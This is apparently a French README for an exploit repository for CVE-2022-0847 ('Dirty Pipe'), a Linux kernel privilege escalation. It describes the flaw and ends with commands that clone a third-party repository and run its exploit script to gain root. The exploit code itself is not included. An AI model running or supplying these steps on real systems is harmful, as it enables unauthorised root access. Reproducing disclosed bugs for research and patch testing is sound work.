
CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 est une vulnérabilité d'élévation de privilèges locale présente dans le noyau Linux 5.8 et versions ultérieures. En exploitant cette vulnérabilité, un attaquant peut écraser les données de n'importe quel fichier lisible, ce qui permet d'élever un utilisateur disposant de privilèges ordinaires au rang de root privilégié. Le principe de la vulnérabilité CVE-2022-0847 est similaire à celui de la faille Dirty Cow (CVE-2016-5195), mais elle est plus facile à exploiter. L'auteur de la vulnérabilité a nommé cette faille « Dirty Pipe ».
Reproduction simple de CVE-2022-0847
Adresse de l'article original du divulgateur : https://dirtypipe.cm4all.com/
Linux kali 5.10.0-kali7-amd64 #1 SMP Debian 5.10.28-1kali1 (2021-04-12) x86_64 GNU/Linux
gcc
git clone https://github.com/imfiver/CVE-2022-0847.git
cd CVE-2022-0847
chmod +x Dirty-Pipe.sh
bash Dirty-Pipe.sh
